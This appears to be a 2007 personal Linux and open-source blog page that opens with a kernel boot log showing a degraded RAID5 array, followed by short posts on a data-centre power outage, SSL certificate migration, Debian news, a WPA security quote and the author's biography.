[ 6.234003] sdd: sdd1
[ 6.240615] sd 2:0:3:0: Attached scsi disk sdd
[ 6.241019] SCSI device sde: 488397168 512-byte hdwr sectors (250059 MB)
[ 6.241041] sde: Write Protect is off
[ 6.241045] sde: Mode Sense: 00 00 00 00
[ 6.241352] SCSI device sde: write cache: enabled, read cache: disabled, supports DPO and FUA
[ 6.241712] SCSI device sde: 488397168 512-byte hdwr sectors (250059 MB)
[ 6.241728] sde: Write Protect is off
[ 6.241732] sde: Mode Sense: 00 00 00 00
[ 6.242034] SCSI device sde: write cache: enabled, read cache: disabled, supports DPO and FUA
[ 6.242038] sde: sde1
[ 6.250295] sd 2:0:4:0: Attached scsi disk sde
[ 6.501907] e1000: 0000:04:02.0: e1000_probe: (PCI-X:66MHz:64-bit) 00:0d:61:6f:b2:06
[ 6.502132] scsi 1:0:1:0: Attached scsi generic sg0 type 5
[ 6.502194] sd 2:0:0:0: Attached scsi generic sg1 type 0
[ 6.502244] sd 2:0:1:0: Attached scsi generic sg2 type 0
[ 6.502306] sd 2:0:2:0: Attached scsi generic sg3 type 0
[ 6.502368] sd 2:0:3:0: Attached scsi generic sg4 type 0
[ 6.502388] ACPI: PCI Interrupt 0000:00:1d.1[B] -> GSI 19 (level, low) -> IRQ 20
[ 6.502409] sd 2:0:4:0: Attached scsi generic sg5 type 0
[ 6.502420] PCI: Setting latency timer of device 0000:00:1d.1 to 64
[ 6.502430] uhci_hcd 0000:00:1d.1: UHCI Host Controller
[ 6.502497] uhci_hcd 0000:00:1d.1: new USB bus registered, assigned bus number 2
[ 6.502550] uhci_hcd 0000:00:1d.1: irq 20, io base 0x0000d800
[ 6.502737] usb usb2: configuration #1 chosen from 1 choice
[ 6.502790] hub 2-0:1.0: USB hub found
[ 6.502809] hub 2-0:1.0: 2 ports detected
[ 6.561303] e1000: eth0: e1000_probe: Intel(R) PRO/1000 Network Connection
[ 6.561372] ACPI: PCI Interrupt 0000:04:02.1[B] -> GSI 49 (level, low) -> IRQ 21
[ 6.687400] md: md0 stopped.
[ 6.790790] usb 1-1: new low speed USB device using uhci_hcd and address 2
[ 6.851537] e1000: 0000:04:02.1: e1000_probe: (PCI-X:66MHz:64-bit) 00:0d:61:6f:b2:07
[ 6.910595] e1000: eth1: e1000_probe: Intel(R) PRO/1000 Network Connection
[ 6.946102] sr0: scsi3-mmc drive: 52x/52x cd/rw xa/form2 cdda tray
[ 6.946117] Uniform CD-ROM driver Revision: 3.20
[ 6.946261] sr 1:0:1:0: Attached scsi CD-ROM sr0
[ 6.947752] Attempting manual resume
[ 6.947759] swsusp: Resume From Partition 8:1
[ 6.947761] PM: Checking swsusp image.
[ 6.947987] PM: Resume from disk failed.
[ 6.984973] kjournald starting. Commit interval 5 seconds
[ 6.985035] EXT3-fs: mounted filesystem with ordered data mode.
[ 7.055071] md: md0 stopped.
[ 7.068433] usb 1-1: configuration #1 chosen from 1 choice
[ 7.107857] md: invalid raid superblock magic on sda
[ 7.107925] md: sda has invalid sb, not importing!
[ 7.107931] md: md_import_device returned -22
[ 7.108130] md: invalid raid superblock magic on sda
[ 7.108194] md: sda has invalid sb, not importing!
[ 7.108201] md: md_import_device returned -22
[ 7.108376] md: invalid raid superblock magic on sda
[ 7.108432] md: sda has invalid sb, not importing!
[ 7.108437] md: md_import_device returned -22
[ 10.046754] e1000: eth0: e1000_watchdog: NIC Link is Up 100 Mbps Full Duplex
[ 11.562138] input: PC Speaker as /class/input/input1
[ 11.623123] pci_hotplug: PCI Hot Plug PCI Core version: 0.5
[ 11.656171] EDAC MC: Ver: 2.0.1 Jun 7 2007
[ 11.699767] shpchp: Standard Hot Plug PCI Controller Driver version: 0.4
[ 11.781507] parport: PnPBIOS parport detected.
[ 11.781601] parport0: PC-style at 0x378 (0x778), irq 7, dma 3 [PCSPP,TRISTATE,COMPAT,ECP,DMA]
[ 11.934009] EDAC e7xxx: tolm = f8000, remapbase = 200000, remaplimit = 204000
[ 11.934119] EDAC MC0: Giving out device to e7xxx_edac E7501: DEV 0000:00:00.0
[ 11.971793] intel_rng: FWH not detected
[ 12.009270] usbcore: registered new interface driver hiddev
[ 12.190587] input: USB Keyboard as /class/input/input2
[ 12.190669] input: USB HID v1.10 Keyboard [ USB Keyboard] on usb-0000:00:1d.0-1
[ 12.197187] iTCO_vendor_support: vendor-support=0
[ 12.239915] iTCO_wdt: Intel TCO WatchDog Timer Driver v1.01 (11-Nov-2006)
[ 12.278863] input: USB Keyboard as /class/input/input3
[ 12.278954] input: USB HID v1.10 Device [ USB Keyboard] on usb-0000:00:1d.0-1
[ 12.278988] usbcore: registered new interface driver usbhid
[ 12.278995] drivers/usb/input/hid-core.c: v2.6:USB HID core driver
[ 12.314631] usbcore: registered new interface driver xpad
[ 12.314645] drivers/usb/input/xpad.c: driver for Xbox controllers v0.1.6
[ 12.559829] input: ImPS/2 Generic Wheel Mouse as /class/input/input4
[ 12.562789] iTCO_wdt: Found a ICH3-S TCO device (Version=1, TCOBASE=0x0460)
[ 12.562838] iTCO_wdt: initialized. heartbeat=30 sec (nowayout=0)
[ 12.603501] md: md0 stopped.
[ 12.653747] md: bind
[ 12.653914] md: bind
[ 12.654064] md: bind
[ 12.654096] md: kicking non-fresh sde1 from array!
[ 12.654101] md: unbind
[ 12.654110] md: export_rdev(sde1)
[ 12.704512] raid5: device sdc1 operational as raid disk 1
[ 12.704516] raid5: device sdd1 operational as raid disk 2
[ 12.704968] raid5: allocated 3163kB for md0
[ 12.704972] raid5: raid level 5 set md0 active with 2 out of 3 devices, algorithm 2
[ 12.705030] RAID5 conf printout:
[ 12.705032] --- rd:3 wd:2
[ 12.705035] disk 1, o:1, dev:sdc1
[ 12.705037] disk 2, o:1, dev:sdd1
[ 13.424989] NET: Registered protocol family 17
[ 13.572430] lp0: using parport0 (interrupt-driven).
[ 13.796845] Adding 19631388k swap on /dev/disk/by-uuid/cf84dd15-e266-462b-a711-db16bd70b6d9. Priority:-1 extents:1 across:19631388k
[ 13.993098] EXT3 FS on sda2, internal journal
[ 16.513909] NET: Registered protocol family 10
[ 16.514110] lo: Disabled Privacy Extensions
[ 16.514837] ADDRCONF(NETDEV_UP): eth1: link is not ready
[ 27.362894] eth0: no IPv6 routers present
[ 415.361598] kjournald starting. Commit interval 5 seconds
[ 415.392572] EXT3 FS on dm-0, internal journal
[ 415.392580] EXT3-fs: mounted filesystem with ordered data mode.
[75070.083687] md: bind
[75070.106882] RAID5 conf printout:
[75070.106892] --- rd:3 wd:2
[75070.106902] disk 0, o:1, dev:sde1
[75070.106909] disk 1, o:1, dev:sdc1
[75070.106915] disk 2, o:1, dev:sdd1

Friday, June 22, 2007

our server was thunder struck

The Parsippany, NJ Facility (OCT) is no longer running on generator power. Full Utility service has been restored. We are conducting a full investigation as to the exact nature of the power problems with the generator that resulted from the lighting strike earlier last night.


"From what we can tell at this point the storm caused a lightning strike to a power pole which knocked out utility power to the area. 

OCT was initially running on battery power from the UPS systems. The generator in OCT failed to auto-start. This appears to have been due to a problem with the batteries in the generator (this is still under investigation). Once the UPS batteries ran out of power the entire site experienced a power loss. Engineering and Facility staff were able to replace the batteries in the generator and perform a manual start. Once the generator was online, power was restored to the facility. We have been running on generator for approximately the last 2 hours. The power company is currently repairing the damaged equipment and expects to have power restored shortly."

Announcements - Net Access Corporation

technorati tags:, , ,

Blogged with Flock

Thursday, June 21, 2007

Moving SSL Certs from IIS to Apache

I found some instructions for converting SSL certificates generated for IIS to private key, and cert files you can use on unix, or Apache for windows.

Moving SSL Certs from IIS to Apache

technorati tags:, , , ,

Blogged with Flock

Wednesday, June 20, 2007

gran paradiso - aka ffx3.0


Gran_Paradiso
Originally uploaded by intothefuzz
escape your hell on the web ie 8.x

qloud invitation in my inbox

Today Qloud was born anew and now it's the music experience on the net you've always wanted.

Because you've been a loyal fan since the beginning, we'd like to invite you to our private beta where you'll be able to:

- Listen to your entire music library (and your friends') from any computer, any time, anywhere.
- Play millions of songs - free, legally, and as much as you want.
- Discover new music through the libraries, playlists, and tags of the user community.

Just head over to Qloud.com , enter your username and password and you'll be ready to go.

As a reminder, during this Beta stage we'll be testing and fixing any technical glitches that may arise.

Please do your part by sending any and all feedback, suggestions and bugs to feedback@qloud.com, or you can head on over to our forum and speak your mind there.

Enjoy and Rock on,

The Qloud Team  [Thanks : dragosh, george, ovi , sergiu, ...]

technorati tags:, , , , , , , ,

Monday, June 18, 2007

apt-get is the ancient word for rpm failure

RPM 'relaunched' at rpm5.org

LWN: RPM 'relaunched' at rpm5.org (Linux.com)

technorati tags:, , , , ,

Blogged with Flock

Wednesday, June 13, 2007

Qubuntu - Linux in a Windows window - gets off to a good start in alpha!

Qubuntu - an emulated version of Qubuntu in the GLP Qemu emulator is designed for people to learn Linux or use Linux along side Windows. Alpha testing of the 0-3 version is well under way - but the more the merrier. Especially anyone with 64Bit Windows hardware and experience!



read more | digg story

Monday, June 11, 2007

lucky mee - got one winfast 2000xp global and ... after a few days i found

Conexant CX23883 chipset Xceive XC2028 Silicon TunerIf you have such a device please contact mrechberger at gmail dot com MarkusRechberger 07:09, 5 April 2007 (CEST) It should be possible to get it work.

Cx88 devices (cx2388x) - V4LWiki

technorati tags:, , , , , , ,

Thursday, June 07, 2007

some comments in the sugar crm/vtiger source code

// handle content-type section in headers
            if(strtolower($key) == 'content-type' && strpos($value, ';')) { // ";" means something follows related to (such as Charset)
                /*     Outlook can't fucking follow RFC if someone PAID them to do it...
                    oh wait, someone paid them NOT to do it. */
           
    $semiColPos = mb_strpos($value, ';');
Vtiger CRM - Wikipedia, the free encyclopedia

technorati tags:, , , , , , ,

Monday, June 04, 2007

QOTD debian - some kind of haiku

etch is now stable.
lenny is now testing.
and sid still unstable.

Multimedia Debian Packages

technorati tags:, , , , , ,

cracking WPA - quote of the day

Consequently, it's actually easier to crack WPA than it is to crack WEP. This flaw is the subject of this article.
[Security by obscurity hits again ]

Cracking Wi-Fi Protected Access (WPA), Part 1 > WPA Overview

technorati tags:, , , , , ,

Monday, May 28, 2007

Use open standards!


Use open standards!
Originally uploaded by Joi
please don't hurt the web

I saw this image on the zak's presentation (from mozilla corp)

Friday, May 11, 2007

I finished my biography for eliberatica 2007 where i will do an firebird/flamerobin presentation

Education:
1998-2001 Automation with specialization Industrial and automation IT (University Petru Maior Tg-Mures)

2002-2005 Mathematics and Computer Sciences (Faculty of Sciences and Letters Department of Petru Maior University, Tg-Mures)
I Live and work in Targu Mures Romania . Currently employed at reea.net as programmer and sys admin , In my free time i do Firebird/Flamerobin advocacy .
I started programming in High school where i played with TurboPascal under Dos and
created an program similar with paintbrush .
My first real job was at wokadat.ro where i had first contact with Interbase/firebird and
Delphi (a real fast rad tool) . Firebird is quite powerful and impressed me with it's simplicity , also i learned about it's inner workings from printed documentation and playing with isql (command line tool).
One day i installed the redhat 6.0 on my workstation and started to learn Perl , After a while i went to Netsoft.ro where i worked with :firebird,perl,delphi,mysql . I wanted this
way to escape the Windows only world and to learn more about linux ,php and perl.
I had an short period and worked for an Microsoft's partner (infopulse.ro) where i learned
this cool language named C# and did some delphi , c++ programming (dcom,com+) and
javascript . On my second partition i had redhat installed and next to me was an solaris machine. Cygwin was an too helped me in that period.
From Jan 2004 until now , i'm working at reea.net located in Tirgu-Mures
- Developed a large range of Web based applications for small/medium organizations in PHP and Perl
- Administration for hosting servers and internal ones and support services for external clients (tomcat, apache, sendmail , qmail , postfix , all open source technologies)
- Technologies used: Perl, Bash, PHP, MySQL, Postgresql, openldap, mono, Firebird database
Hobbies : open source programming (c++,php,oopascal), traveling , Firebird/Linux advocacy , biking

Thursday, May 10, 2007

The DWL-G122 wireless adapter doesn't work "out of the box" in Ubuntu Festy due to a bug that has been also posted on launchpad. This article will guide you on bypassing this bug quickly and easily.i used this guide for installing the driver from cvs

http://ubuntuforums.org/showthread.php?t=400236

Tuesday, May 08, 2007

An Angel's Face


An Angel's Face
Originally uploaded by Happy.Phantom.
it looks like an dark angel to me
anyway is scary

Angel #1


Angel #1
Originally uploaded by pinhole.
when you are tired of the world's pain try to cry it out